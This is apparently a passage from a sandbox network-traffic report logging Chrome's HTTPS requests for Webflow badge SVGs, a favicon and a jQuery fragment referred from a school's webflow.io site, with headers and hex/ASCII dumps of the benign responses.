                                                    2025-03-28 12:42:41 UTC8173INData Raw: 20 74 68 69 73 2e 70 61 72 65 6e 74 28 65 29 2e 6e 6f 74 28 22 62 6f 64 79 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 28 74 68 69 73 29 2e 72 65 70 6c 61 63 65 57 69 74 68 28 74 68 69 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7d 29 2c 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 28 65 29 7d 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65
                                                    Data Ascii: this.parent(e).not("body").each(function(){S(this).replaceWith(this.childNodes)}),this}}),S.expr.pseudos.hidden=function(e){return!S.expr.pseudos.visible(e)},S.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().le


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.54973713.33.251.2104436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:41 UTC692OUTGET /img/webflow-badge-icon-d2.89e12c322e.svg HTTP/1.1
                                                    Host: d3e54v103j8qbb.cloudfront.net
                                                    Connection: keep-alive
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Sec-Fetch-Storage-Access: active
                                                    Referer: https://littlestownseniorhighschool.webflow.io/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:41 UTC579INHTTP/1.1 200 OK
                                                    Content-Type: image/svg+xml
                                                    Content-Length: 421
                                                    Connection: close
                                                    Last-Modified: Thu, 21 Sep 2023 16:04:04 GMT
                                                    X-Amz-Server-Side-Encryption: AES256
                                                    Accept-Ranges: bytes
                                                    Server: AmazonS3
                                                    Date: Fri, 28 Mar 2025 02:50:09 GMT
                                                    Cache-Control: max-age=84600, must-revalidate
                                                    Etag: "89e12c322e66c81213861fc9acb8b003"
                                                    Via: 1.1 e00a954a79782fdd3cf71c54f8d15496.cloudfront.net (CloudFront)
                                                    Age: 35553
                                                    Access-Control-Allow-Origin: *
                                                    X-Cache: Hit from cloudfront
                                                    X-Amz-Cf-Pop: JFK50-P10
                                                    X-Amz-Cf-Id: tOyHpvjgCwDoJULOafpuGPCkoDKawJ9ED-mlVgIrsGnrT1oaySb06Q==
                                                    2025-03-28 12:42:41 UTC421INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 36 20 31 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 35 2e 36 35 20 30 4c 31 37 2e 34 36 35 34 20 31 36 48 39 2e 37 37 37 37 38 4c 31 33 2e 32 30 33 20 39 2e 33 36 38 39 32 48 31 33 2e 30 34 39 33 43 31 30 2e 32 32 33 35 20 31 33 2e 30 33 37 32 20 36 2e 30 30 37 33 38 20 31 35 2e 34 35 32 20 30 20 31 36 56 39 2e 34 36 30 36 38 43 30 20 39 2e 34 36 30 36 38 20 33 2e 38 34 33
                                                    Data Ascii: <svg width="26" height="16" viewBox="0 0 26 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M25.65 0L17.4654 16H9.77778L13.203 9.36892H13.0493C10.2235 13.0372 6.00738 15.452 0 16V9.46068C0 9.46068 3.843


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.54973613.33.251.2104436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:41 UTC692OUTGET /img/webflow-badge-text-d2.c82cec3b78.svg HTTP/1.1
                                                    Host: d3e54v103j8qbb.cloudfront.net
                                                    Connection: keep-alive
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Sec-Fetch-Storage-Access: active
                                                    Referer: https://littlestownseniorhighschool.webflow.io/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:41 UTC580INHTTP/1.1 200 OK
                                                    Content-Type: image/svg+xml
                                                    Content-Length: 9912
                                                    Connection: close
                                                    Date: Thu, 27 Mar 2025 20:17:35 GMT
                                                    Last-Modified: Thu, 21 Sep 2023 16:04:31 GMT
                                                    Etag: "c82cec3b78a2b2d267bbfe3c7e838068"
                                                    X-Amz-Server-Side-Encryption: AES256
                                                    Cache-Control: max-age=84600, must-revalidate
                                                    Accept-Ranges: bytes
                                                    Server: AmazonS3
                                                    Via: 1.1 f00bb95b8c55d1da29ae14415a8da844.cloudfront.net (CloudFront)
                                                    Age: 59107
                                                    Access-Control-Allow-Origin: *
                                                    X-Cache: Hit from cloudfront
                                                    X-Amz-Cf-Pop: JFK50-P10
                                                    X-Amz-Cf-Id: 1mijsuuFrmqbXUOblieJsarkBCcBIK2jcrYoLXU8rUpRY6zMS-nl9A==
                                                    2025-03-28 12:42:41 UTC9912INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 31 38 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 31 38 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 30 2e 35 32 35 30 32 34 20 30 2e 38 39 36 34 38 34 48 33 2e 30 35 34 33 32 4c 36 2e 30 30 37 37 36 20 38 2e 32 36 36 32 32 4c 38 2e 38 39 39 30 35 20 30 2e 38 39 36 34 38 34 48 31 31 2e 33 35 33 31 56 31 31 48 39 2e 34 37 33 32 37 56 33 2e 37 39 39 34 39 4c 36 2e 36 36 33 37 20 31 31 48 35 2e 31 38 37 31 33 4c 32 2e 33 38 34 34 20 33 2e 39 32 30 37 37 56 31 31 48 30 2e 35 32 35 30 32 34 56 30 2e 38 39 36 34 38 34 5a 22 20 66 69 6c 6c 3d
                                                    Data Ascii: <svg width="118" height="12" viewBox="0 0 118 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0.525024 0.896484H3.05432L6.00776 8.26622L8.89905 0.896484H11.3531V11H9.47327V3.79949L6.6637 11H5.18713L2.3844 3.92077V11H0.525024V0.896484Z" fill=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.549738104.18.160.1174436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:42 UTC664OUTGET /img/favicon.ico HTTP/1.1
                                                    Host: cdn.prod.website-files.com
                                                    Connection: keep-alive
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Sec-Fetch-Storage-Access: active
                                                    Referer: https://littlestownseniorhighschool.webflow.io/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:42 UTC645INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:42:42 GMT
                                                    Content-Type: image/x-icon
                                                    Content-Length: 15086
                                                    Connection: close
                                                    x-amz-id-2: QRs3q+dhKhAMTlvzYZ9HsOXkYLhQn66tiVr3vbhVW/V2FbAxceQ9QjMXwPqcyzjtLgD1BjyzKEE=
                                                    x-amz-request-id: BSTN61CAHM9SMTMC
                                                    Last-Modified: Thu, 05 Oct 2023 23:38:20 GMT
                                                    ETag: "1f894f487d068a2ced95d5cd4f88598c"
                                                    x-amz-server-side-encryption: AES256
                                                    Cache-Control: max-age=84600, must-revalidate
                                                    x-amz-version-id: C5TuT6ObkzP1GjuEGkIHJatwDHqj5J6N
                                                    CF-Cache-Status: HIT
                                                    Age: 30871
                                                    Accept-Ranges: bytes
                                                    Access-Control-Allow-Origin: *
                                                    Server: cloudflare
                                                    CF-RAY: 9277357df8f44414-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2025-03-28 12:42:42 UTC724INData Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 32 2b 88 39 32 2b f3 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                    Data Ascii: 00 %6 % h6(0` $92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                    Data Ascii: +92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                    2025-03-28 12:42:42 UTC1369INData Raw: ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32
                                                    Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92
                                                    2025-03-28 12:42:42 UTC1369INData Raw: f8 f8 f8 ff f8 f8 f8 ff f8 f8 f8 ff f7 f7 f7 ff 8e 8a 86 ff 37 30 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 38 30 29 ff 50 49 43 ff e0 e0 df ff f8 f9 f9 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f9 f9 f9 ff f9 f9 f9 ff e2 e1 e0 ff 9a 96 93 ff 4b 44 3e ff 44 3d 36 ff c9 c7 c5 ff f9 fa fa ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f9 f9 f9 ff d6 d5 d4 ff 4f 49 42 ff 38 31 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b
                                                    Data Ascii: 70)92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+80)PICKD>D=6OIB81)92+92+92+92+92+92+92+92+92+
                                                    2025-03-28 12:42:42 UTC1369INData Raw: f9 f9 ff de dd dc ff 56 50 4a ff 37 30 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 38 31 2a ff 4b 45 3f ff c0 be bc ff d3 d2 d1 ff d2 d1 d0 ff d2 d1 d0 ff d1 cf ce ff d9 d8 d6 ff f5 f4 f4 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff 9c 99 96 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff
                                                    Data Ascii: VPJ70)92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+81*KE?92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 3c 36 2f ff 53 4d 47 ff 57 51 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 57 51 4b ff 50 4a 44 ff 3b 34 2d ff 38 31 2a ff 41 3a 33 ff 56 50 4a ff 56 51 4b ff 56 50 4b ff 57 51 4b ff 54 4e 48 ff 3f 38 31 ff 39 32 2a ff 3a 33 2d ff 50 4a 44 ff 57 51 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 57 51 4b ff 4f 49 43 ff 3a 33 2c ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                    Data Ascii: +92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+<6/SMGWQKVPKVPKVPKWQKPJD;4-81*A:3VPJVQKVPKWQKTNH?8192*:3-PJDWQKVPKVPKVPKVPKWQKOIC:3,92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                    2025-03-28 12:42:42 UTC1369INData Raw: ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32
                                                    Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b f3 39 32 2b 89 39 32 2b f4 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b
                                                    Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff
                                                    Data Ascii: 2+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 3c 35 2e ff 54 4e 48 ff 76 72 6d ff b2 b0 ad ff eb ea ea ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f3 f3 f3 ff f6 f6 f6 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff ef ef ef ff 72 6d 68 ff 36 2f 28 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 3f 39 32 ff 68 63 5d ff 6e 69 64 ff 74 6f 6b ff b1 ae ab ff f5 f5 f5 ff f7 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff fa fa fa ff c0 be bc ff 41 3b 34 ff 38 31 2a ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                    Data Ascii: +92+<5.TNHvrmrmh6/(92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+?92hc]nidtokA;481*92+92+92+92+92+92+92+92+92+92+92+92+9


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.54974013.33.251.1404436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:42 UTC433OUTGET /img/webflow-badge-icon-d2.89e12c322e.svg HTTP/1.1
                                                    Host: d3e54v103j8qbb.cloudfront.net
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Sec-Fetch-Storage-Access: active
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:42 UTC579INHTTP/1.1 200 OK
                                                    Content-Type: image/svg+xml
                                                    Content-Length: 421
                                                    Connection: close
                                                    Date: Fri, 28 Mar 2025 07:58:47 GMT
                                                    Last-Modified: Thu, 21 Sep 2023 16:04:04 GMT
                                                    Etag: "89e12c322e66c81213861fc9acb8b003"
                                                    X-Amz-Server-Side-Encryption: AES256
                                                    Cache-Control: max-age=84600, must-revalidate
                                                    Accept-Ranges: bytes
                                                    Server: AmazonS3
                                                    Via: 1.1 c5f8d9953ac8f752d458b0ffba0f2074.cloudfront.net (CloudFront)
                                                    Age: 17036
                                                    Access-Control-Allow-Origin: *
                                                    X-Cache: Hit from cloudfront
                                                    X-Amz-Cf-Pop: JFK50-P10
                                                    X-Amz-Cf-Id: Pwk3ER_iDmya0ec6xhtaSwXb5MVNQRCXcnYvrh42q7nVkV0UKDvLkw==
                                                    2025-03-28 12:42:42 UTC421INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 36 20 31 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 35 2e 36 35 20 30 4c 31 37 2e 34 36 35 34 20 31 36 48 39 2e 37 37 37 37 38 4c 31 33 2e 32 30 33 20 39 2e 33 36 38 39 32 48 31 33 2e 30 34 39 33 43 31 30 2e 32 32 33 35 20 31 33 2e 30 33 37 32 20 36 2e 30 30 37 33 38 20 31 35 2e 34 35 32 20 30 20 31 36 56 39 2e 34 36 30 36 38 43 30 20 39 2e 34 36 30 36 38 20 33 2e 38 34 33
                                                    Data Ascii: <svg width="26" height="16" viewBox="0 0 26 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M25.65 0L17.4654 16H9.77778L13.203 9.36892H13.0493C10.2235 13.0372 6.00738 15.452 0 16V9.46068C0 9.46068 3.843


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.54973913.33.251.1404436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:42 UTC433OUTGET /img/webflow-badge-text-d2.c82cec3b78.svg HTTP/1.1
                                                    Host: d3e54v103j8qbb.cloudfront.net
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Sec-Fetch-Storage-Access: active
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:42 UTC580INHTTP/1.1 200 OK
                                                    Content-Type: image/svg+xml
                                                    Content-Length: 9912
                                                    Connection: close
                                                    Date: Thu, 27 Mar 2025 20:17:35 GMT
                                                    Last-Modified: Thu, 21 Sep 2023 16:04:31 GMT
